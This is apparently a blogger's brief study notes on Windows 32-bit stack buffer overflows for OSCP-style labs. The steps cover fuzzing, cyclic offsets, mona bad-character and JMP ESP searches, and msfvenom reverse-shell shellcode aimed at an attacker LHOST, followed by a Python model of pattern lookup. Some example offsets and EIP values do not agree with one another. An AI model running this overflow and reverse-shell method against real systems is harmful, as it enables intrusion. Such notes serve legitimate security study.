Binary Exploitation (a *very* brief overview)

Binary Exploitation

During my studies to become OSCP certified I studied quite a bit but never delved too far into binary exploitation. Here are a few takeaways and things that I occasionally look back at. Mostly here's the high-level operational view. Mind you, this is for a 32-bit Windows app lol

Guide

1. Start Immunity/app as administrator

2. Confirm connectivity from Kali
nc xxx.xxx.xxx.xxx port
3. Fuzz for crash (Template - Fuzzer)
python3 fuzzer.py
4. Generate cyclic pattern to find exact crash
[root@kali:/root]# cyclic 300
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaac
5. Add pattern to "overflow" in exploit.py and repro crash
6. Get offset from address in EIP and set "offset"

Read the value in EIP after the crash and find the number of bytes before EIP:

[root@kali:/r/c/CMBOF]# cyclic -l 0x61616275
2003
7. Remove cyclic pattern from "overflow" and replace with "A" * offset
offset = 634 # EIP @ 0x616A6761
overflow = b"A" * offset
eip = b"BBBB" # should show up in EIP as 42424242
8. Replicate crash and confirm "B" in EIP
9. Find Bad Characters with mona
  • Set working dir: !mona config -set workingfolder C:\Windows\Temp
  • Create bytearray (without bad chars we know about): !mona bytearray -cpb "\x00"
  • Include list chars in payload (without \x00)
badchars = [0x00] # start with null
  • Repro crash with charpayload
  • After the crash use mona to find the next bad char: !mona compare -f C:\Windows\Temp\bytearray.bin -a esp
  • Note new bad char, add it to "badchars"
  • Repeat steps until no new bad chars are reported
10. Find Jump Point using bad chars (running or crashed) - will be in "Log Data" window
!mona jmp -r esp -cpb "\x00\x23\x3c\x83\xba"
11. Put jmp address in "eip" var backwards (little endian)
eip = b"\xaf\x11\x50\x62" # 625011AF
12. Generate shellcode without bad chars and add as "sc" var
[root@kali:/r/c/t/O/OVERFLOW2]# msfvenom -p windows/shell_reverse_tcp LHOST=10.11.4.230 LPORT=6666 EXITFUNC=thread -b "\x00\x23\x3c\x83\xba" -f python -v sc
13. Add shellcode
14. Add NOPs and comment out "charpayload"
padding = b"\x90" * 16
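
How steps 4 to 6 work, as an added example that is not part of the original post: a minimal Python model of the de Bruijn pattern that `cyclic` prints and of the `cyclic -l` lookup, showing why four bytes in EIP identify exactly one offset. The function names are mine, and the lowercase alphabet, 4-byte window and little-endian register are assumptions.

```python
import itertools
import string


def de_bruijn(alphabet, n):
    """Lazily yield a de Bruijn sequence: each length-n window occurs once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length, n=4):
    """First `length` bytes of the pattern, like `cyclic 300` in step 4."""
    seq = itertools.islice(de_bruijn(string.ascii_lowercase, n), length)
    return "".join(seq).encode()


def cyclic_find(reg_value, n=4, search_len=10000):
    """Offset of the register value in the pattern, like `cyclic -l` in step 6.

    x86 loads the 4 pattern bytes little-endian, so the register value is
    converted back to memory order first. Returns -1 when the value is not
    pattern data (register not controlled, or bytes mangled in transit).
    """
    needle = reg_value.to_bytes(n, "little")
    return cyclic(search_len, n).find(needle)


if __name__ == "__main__":
    print(cyclic(32).decode())
    for value in (0x61616275, 0x616A6761, 0x42424242):  # values from the page
        print(hex(value), "->", cyclic_find(value))
```

A result of -1 means the crash did not put pattern bytes into the register, which is worth checking before trusting any offset.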
